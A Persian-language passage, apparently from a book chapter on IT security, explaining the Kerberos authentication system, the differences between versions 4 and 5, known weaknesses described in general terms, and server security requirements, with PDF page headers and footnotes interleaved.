ﺍﻧﺠﺎﻡ ﻣﻲﺷﺪ ﺗﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺩﺭ ﺷﺒﻜﻪ ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻢ ﻗﺒﻠﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ ﺑﻮﺩ ﺣﻔﺎﻇﺖ ﺑﻪ ﻋﻤﻞ ﻣﻲﺁﻣﺪ.
ﺭﺍﻩﺣﻞ ﻧﻬﺎﻳﻲ MITﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ " "Kerberosﺑﻮﺩ؛ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺱ -ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎﺯ -ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ DESﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ .ﻭﻗﺘﻲ ﻛـﺎﺭﺑﺮﻱ ﺩﺭ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﻪ
Kerberosﺭﻭﻱ ﺁﻥ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﻳﻚ "ﺑﻠﻴﻂ" ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ .ﺑﻠـﻴﻂ ﻛـﺎﺭﺑﺮ
ﺗﻨﻬﺎ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺑﺎﺯ ﻣﻲﺷﻮﺩ ﻭ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺖ .ﺍﺯ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ ،ﻫﺮﮔـﺎﻩ ﻛـﺎﺭﺑﺮ
ﺑﺨﻮﺍﻫﺪ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ ،ﺑﺎﻳﺪ ﻳﻚ ﺑﻠﻴﻂ ﺧﺎﺹ ﺁﻥ ﺳﺮﻭﻳﺲ ﺍﺭﺍﺋﻪ ﻛﻨـﺪ .ﭼـﻮﻥ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺑﻠـﻴﻂﻫـﺎﻱ
Kerberosﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ،ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﻗﺎﺑﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻫﻢ ﻧﻴﺴﺘﻨﺪ.
ﭘﻨﺞ ﺑﺎﺯﻧﮕﺮﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺗﺎﺭﻳﺦ Kerberosﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺯ ﺩﻭ ﻧـﺴﺨﺔ Kerberosﺩﺭ ﺑـﺎﺯﺍﺭ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ.
Kerberos 4ﺍﺯ Kerberos 5ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﻣﺎ ﻣﺤﺪﻭﺩﺗﺮ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ Kerberos 4ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ TCP/IP
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻛﺎﺭ ﻛﻨﺪ ،ﭼﻨﺪ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺍﺭﺗﻘﺎ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ،ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻗـﺪﻳﻤﻲ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﺩ .ﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ۱۹۹۶ﻓـﺎﺭﻍﺍﻟﺘﺤـﺼﻴﻼﻥ
ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ) COASTﮐﻪ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺑﺎ ﻣﺮﮐﺰ ﺗﺤﻘﻴﻘﺎﺗﻲ CERIASﺍﺩﻏﺎﻡ ﺷﺪﻩ ﺍﺳﺖ( ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ Purdueﻳـﻚ ﺿـﻌﻒ ﻋﻤﻴـﻖ ﺩﺭ ﻧﺤـﻮﺓ
ﺳﺎﺧﺘﻪﺷﺪﻥ ﻛﻠﻴﺪ Kerberos 4ﻛﺸﻒ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻠﻴﺪﻫﺎﻱ ﻧﺸﺴﺖ ﺭﺍ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺣﺪﺱ ﺑﺰﻧﺪ .ﻫﺮﭼﻨﺪ
ﺑﺮﺍﻱ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻳﻚ ﺍﺻﻼﺡ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩ ﺗﻮﺯﻳﻊ ﺷﺪ ،ﺍﻣﺎ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ Kerberos 4ﺩﺭ ﺑﺮﺍﺑﺮ
ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰﻱ bufferﻫﻢ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭻ ﺍﺻﻼﺣﻲ ﻧﻴﺰ ﺑﺮﺍﻳﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻧﺸﺪﻩ ﺍﺳﺖ.
Kerberos 5ﻣﺸﻜﻼﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﭘﺮﻭﺗﻜﻞ Kerberosﺭﺍ ﺭﻓﻊ ﻛﺮﺩ ﻭ ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ﻣﻌﻤـﻮﻝ ﺷـﺒﻜﻪ ﻣﻘـﺎﻭﻣﺘﺮ ﺳـﺎﺧﺖ.
Kerberos 5ﻫﻤﭽﻨﻴﻦ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﺗﺮ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ﻛﺎﺭ ﻛﻨﺪ Kerberos 5 .ﻫﻤﭽﻨﻴﻦ ﭘﻴﺶﺑﻴﻨﻲﻫﺎﻳﻲ ﺑـﺮﺍﻱ
ﻛﺎﺭ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻏﻴﺮ DESﺩﺍﺭﺩ .ﺍﮔﺮﭼﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻣﺜﻞ DESﺳﻪﮔﺎﻧﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩﺍﻧﺪ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﭼﻨـﺪﺍﻥ
ﮔﺴﺘﺮﺩﻩ ﻧﻴﺴﺖ ،ﺑﻴﺸﺘﺮ ﺑﻪ ﺩﻟﻴﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻗﺪﻳﻤﻲ ﻛﻪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ.
ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ Kerberos 5ﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﺟﺪﻳﺪ ﻧﻴﺰ ﺩﺍﺭﺩ :ﺍﻣﻜﺎﻥ ﺗﻔﻮﻳﺾ ﺷﺪﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺑﻠﻴﻄﻬﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻥ ﺍﻧﻘـﻀﺎﻱ ﺑـﻴﺶ ﺍﺯ
۲۱ﺳﺎﻋﺖ ،ﺑﻠﻴﻄﻬﺎﻱ ﺗﺠﺪﻳﺪ ﭘﺬﻳﺮ ،ﺑﻠﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺯﻣﺎﻧﻲ ﺩﺭ ﺁﻳﻨﺪﻩ ﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﮔﺰﻳﻨـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺩﻳﮕـﺮ .ﭼﻨﺎﻧﭽـﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ
Kerberosﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ Kerberos 5ﺭﺍ ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ IETF.ﺭﻭﻱ ﺑﺎﺯﻧﮕﺮﻱ ﻭ ﺗـﺸﺮﻳﺢ RFCﺷـﻤﺎﺭﺓ - ۱۵۱۰ﻛـﻪ
Kerberos 5ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ -ﻛﺎﺭ ﻛﺮﺩﻩ ﻭ ﭼﻨﺪ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻞ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ Kerberosﺗﻤﺎﻣﹰﺎ ﺑﺮ ﺍﺳﺎﺱ ﺩﺍﻧﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Kerberosﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ.
ﺑﺮﺧﻼﻑ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ Unixﻛﻪ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﻜﻄﺮﻓﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ،ﺭﻣﺰ ﻋﺒﻮﺭ Kerberosﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎ ﻳـﻚ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﺘﺪﺍﻭﻝ -ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ - DESﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ،ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺷـﻮﺩ.
ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺑﺎ ﺍﺛﺒﺎﺕ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ،ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺗﺼﺪﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ.
ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﺓ ﻛﺎﺭﺑﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ Kerberosﺍﺯ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﺪ ١٧٣.ﺍﻳﻦ ﻳﻚ ﻋﻴﺐ ﺟـﺪﻱ ﺳﻴـﺴﺘﻢ Kerberosﺍﺳـﺖ .ﻣﻌﻨـﻲ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ﻭ ﻫﻢ "ﺍﻳﻤﻨﻲ ﻣﺤﺎﺳﺒﺎﺗﻲ" ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ
ﺑﺎﺷﺪ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﺍﻓﺸﺎﻱ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺣﻤـﻼﺕ
ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ،ﭼﺮﺍﮐﻪ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻭﺍﺭﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺷﻮﺩ ﻭ ﺩﺳﺘﺮﺳﻲ " "rootﭘﻴﺪﺍ ﻛﻨﺪ ،ﺑـﺎﺯ ﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺪﺯﺩﺩ.
Kerberosﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﻣﺴﺘﻘﻞ ﺍﺯ ﺣﺎﻟﺖ ﺑﺎﺷﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﻘـﻂ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﻛـﺎﺭﺑﺮﺍﻥ
ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻭ ﻫﺮﮔﺎﻩ ﻻﺯﻡ ﺑﻮﺩ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺍﻳﺠﺎﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻜﺮﺍﺭ ﻭ ﺛﺎﻧﻮﻳﻪ -ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻـﻠﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ -ﺭﺍ ﻧـﺴﺒﺘﹰﺎ ﺁﺳـﺎﻥ ﻣـﻲﻛﻨـﺪ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻳـﻦ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻧﻴﺎﺯ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻣﻠﻲ ﺍﺯ ﺗﻤﺎﻡ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ Kerberosﺩﺍﺭﻧﺪ ،ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛـﻪ
ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﻭ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻳﻤﻦ ﺑﺎﺷﻨﺪ.
۱۷۳ﭼﻮﻥ ﺯﻣﺎﻧﻴﻜﻪ kerberosﺗﻮﻟﻴﺪ ﺷﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺎﻧﻮﻥ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ ﺑـﻮﺩ ،ﺍﺯ ﺁﻥ ﺩﺭ kerberosﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ .ﻳـﻚ
ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﻪ ﺍﺯ ﻃﺮﻑ IETFﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻨﻮﺍﻥ "ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺁﻏﺎﺯﻳﻦ ﺩﺭ "kerberosﻣﻌﺮﻓﻲ ﺷﺪﻩ ،ﻭ ﺭﻭﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺩﻏـﺎﻡ
ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺎ kerberosﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩ ﺑﻮﺳﻴﻠﺔ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ.
۱۷۴ﻭﺻﻠﻪﻫﺎﻱ OpenSSHﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ Kerberos 5ﺩﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ:
http://www.sxw.org.uk/computing/patches/openssh.html
ﻫﺮﭼﻨﺪ ﺩﺭ ﻛﻨﺎﺭ Kerberos 4ﺍﺯ SSHﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻩ ،ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻛﻪ ﺩﻭ ﺳﻴﺴﺘﻢ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻧﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻛـﺮﺩ .ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ ﭘﺮﻭﺗﻜـﻞ
SSHﻧﮕﺎﺭﺵ ۲ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻻﻳﻪ ﺍﻣﻨﻴﺘﻲ ﻣﺸﺎﺑﻪ (GSSAPI) Kerberos 5ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﻛﻪ ﺑﺎﻋﺚ ﺳﺎﺩﻩ ﺷﺪﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻣﺴﺎﺋﻞ ﻣﻲﺷﻮﺩ .ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﺔ ﻣﺮﺑـﻮﻁ
ﺑﻪ IETFﻛﻪ ﺍﺩﻏﺎﻡ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ .draft-ietf-secsh-gsskeyex
٣٣٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ Kerberosﺑﺎﻳﺪ ﺑﺪﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺭﺍ ﭼﮕﻮﻧﻪ ﭘﻴﺪﺍ ﻛﻨﺪ ،ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗـﻮﺍﻥ ﻫـﺮ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ )ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺩﺭ ﻓﺎﻳﻞ ،(krb5.confﻳﺎ ﻣﻲﺗـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ Kerberosﺭﺍ ﺑـﺎ
ﺍﻗﻼﻡ ﺩﺍﺩﺓ DNS SRVﺍﻋـﻼﻡ ﻋﻤـﻮﻣﻲ ﻧﻤـﻮﺩ ،ﮐـﻪ ﺩﺭ ﺳـﻨﺪ IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate
ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭ Kerberos 4ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﺮﺩﻳـﺪ ،ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﭘﻴـﺎﻣﻲ ﺭﺍ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
Kerberosﻣﻲﻓﺮﺳﺘﺪ ١٧٥.ﺍﻳﻦ ﭘﻴﺎﻡ ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎﺳﺖ ﻭ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺷـﻤﺎ ﺳـﻌﻲ ﺩﺍﺭﻳـﺪ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﺷـﻮﻳﺪ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺧﻮﺩ ﭘﺮﻭﻧﺪﺓ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺷـﻨﺎﺧﺘﻪ ﺷـﻮﻳﺪ،
ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺳـﭙﺲ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﺍﺯ ﺷـﻤﺎ
ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺑﻠﻴﻂ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺑـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻛـﻪ ﺷـﻤﺎ ﺍﺭﺍﺋـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ .ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ،ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﻲﻛﻨﺪ ،ﻭ ﻣﻨﺤﺼﺮﹰﺍ ﺍﺯ ﺑﻠـﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻪ ﺷﻜﺴﺖ ﺑﻴﺎﻧﺠﺎﻣﺪ ،ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺎﺩﺭﺳﺘﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﺍﺯ ﺷـﻤﺎ
